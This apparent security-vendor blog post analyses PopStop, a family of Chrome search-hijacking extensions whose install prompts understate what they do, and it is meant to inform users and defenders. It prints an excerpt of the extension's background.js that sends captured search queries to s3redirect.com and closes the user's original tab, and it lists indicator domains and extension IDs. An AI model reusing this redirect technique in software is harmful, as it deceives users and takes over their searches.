"But I checked the permissions before I installed this pop-up blocker—it said nothing about changing my searches," my dad retorts after I scold him for installing yet another search-hijacking Chrome extension. Granted, they are not hard to remove, but having to do it over and over is a nuisance. This is especially true because it can be hard to find out which of the Chrome extensions is the culprit if the browser starts acting up.

What happened?

Recently, we came across a family of search hijackers that are deceptive about the permissions they are going to use in their install prompt. This extension, called PopStop, claims it can only read your browsing history. Seems harmless enough, right?

PopStop install message

The install prompt in the webstore is supposed to give you accurate information about the permissions the extension you are about to install requires. It is already common practice for browser extensions to only ask for the permissions needed to function properly up front—then ask for additional permissions later on, after installing. Why? Users are more likely to trust an extension with limited warnings or when permissions are explained to them.

But what is the use of these informative prompts if they only give you half the story? In this case, the PopStop extension doesn't just read your browsing history, as the pop-up explains, but it also hijacks your search results.

Some of these extensions are more straightforward once the user installs them and they are listed under the installed extensions.

Niux APP extension

But others are consistent in their lies even after they have been installed, which makes it even harder to find out which one is responsible for the search hijack.

PopStop extension

How is this possible?

Google at some point decided to bar extensions that obfuscate their code. That makes it easier for reviewers to read the plug-in's code and conduct appropriate analysis.

The first step in determining what an extension is up to is in looking at the manifest.json file.

manifest.json

Registering a script in the manifest tells the extension which file to reference, and, optionally, how that file should behave.

What this manifest tells us is that the only active script is "background.js" and the declared permissions are "tabs" and "storage". More about those permissions later on.

The relevant parts in background.js are these pieces, because they show us where our searches are going:

    // piece 1: the landing domain the searches are sent to
    const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401;

    // piece 2: open the hijacker's results page for the captured query,
    // then close the tab the user actually searched in
    chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});
    setTimeout(() => {
      chrome.tabs.remove(currentTabId);
    }, 10);

This script uses two chrome.tabs methods: one to create a new tab based on your search query, and the other to close the current tab. The closed tab would have displayed the search results from your default search provider.

Looking at the chrome.tabs API, we read:

"You can use most chrome.tabs methods and events without declaring any permissions in the extension's manifest file. However, if you require access to the url, pendingUrl, title, or favIconUrl properties of tabs.Tab, you must declare the "tabs" permission in the manifest."

And indeed, in the manifest of this extension we find:

          "permissions": [ "tabs", "storage" ],        

The "storage" permission does not produce a message in the warning screen users see when they install an extension. The "tabs" permission is the reason for the "Read your browsing history" message. Although the chrome.tabs API might be used for different reasons, it can also be used to see the URL associated with every newly-opened tab.

The extensions we found managed to avoid having to display the message "Read and modify all your data on the websites you visit", which is shown for host permissions covering the sites you visit (and which a hijacker that rewrites the results page in place, or uses a method such as "tabCapture", would need). They did this by closing the current tab after capturing your search term and opening a new tab to perform the search for that term on their own site.

The "normal" permission warnings for a search hijacker would look more like this:

The end result is the same, but an experienced user would be less likely to install this last extension, as they would either balk at the permission request or recognize the plug-in as a search hijacker by looking at these messages.

Are these extensions really lying?

Some might call it a lie. Some may say no, they simply didn't offer the whole truth. However, the point of those permission pop-ups is to give users the choice on whether to install a program by being upfront about what that program asks of its users.

In the case of these Chrome extensions, then, let's just say that they're not disclosing the full extent of the consequences of installing their extensions.

It might be desirable if Google were to add a warning message for extensions that use the chrome.tabs.create method. This would inform the user that the extension will be able to open new tabs, which is one way of showing advertisements, so users would be made aware of this possibility. And chrome.tabs.create also happens to be the method that this extension uses to replace the search results we were after with its own.

An additional advantage for these extensions is the fact that they don't get listed in the settings menu the way a "regular" search hijacker would.

A search hijacker that replaces your default search engine would be listed under Settings > Search engine.

Not being listed as the search engine replacement, again, makes it harder for a user to figure out which extension might be responsible for the unexpected search results.

For the moment, these hijackers can be recognized by the new header they add to their search results, which looks like this:

This will probably change once their current domains are flagged as landing pages for hijackers, and new extensions will be created using other landing pages.

Further details

These extensions intercept search results from these domains:

  • aliexpress.com
  • booking.com
  • all google domains
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

It also intercepts all queries that contain the string "spalp2020". This is probably because that string is a common factor in the installer URLs that belong to the powerapp.download family of hijackers.

Search hijackers

We have written before about the interests of shady developers in the billion-dollar search industry and reported on the different tactics these developers resort to in order to get users to install their extensions or use their search sites[1],[2],[3].

While this family doesn't employ the most deceptive marketing practices out there, it still hides its bad behavior in plain sight. Many users have learned to read the install prompt messages carefully to determine whether an extension is safe. It's disappointing that developers can evade giving honest information and that these extensions make their way into the webstore over and over again.

IOCs

extension identifiers:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

search domains:

s3redirect.com

s3arch.page

gooogle.page <= note the extra "o"

Malwarebytes detects these extensions under the detection name PUP.Optional.SearchEngineHijack.Generic.

Stay safe, everyone!